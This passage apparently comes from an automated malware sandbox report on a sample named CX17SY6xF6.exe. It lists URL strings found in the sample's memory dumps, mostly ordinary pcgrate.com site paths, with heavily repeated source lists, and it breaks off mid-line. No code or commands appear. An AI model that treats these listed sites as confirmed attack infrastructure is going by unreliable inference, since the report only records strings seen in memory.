00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ozs.si/o-zbornici
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pb-games.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#author
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#logo
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#organization
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#richSnippet
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#webpage
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/#website
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/?s=
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/cart/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/checkout/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/comments/feed/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/feed/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-admin/admin-ajax.php
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1024px-Logo_Ball_Corporation.svg_-e1637155176306.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1200px-Zeiss_logosvg-e1626287816597.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1280px-Jet_Propulsio.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1920px-Raytheon.svg_-1-e1626285787717.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 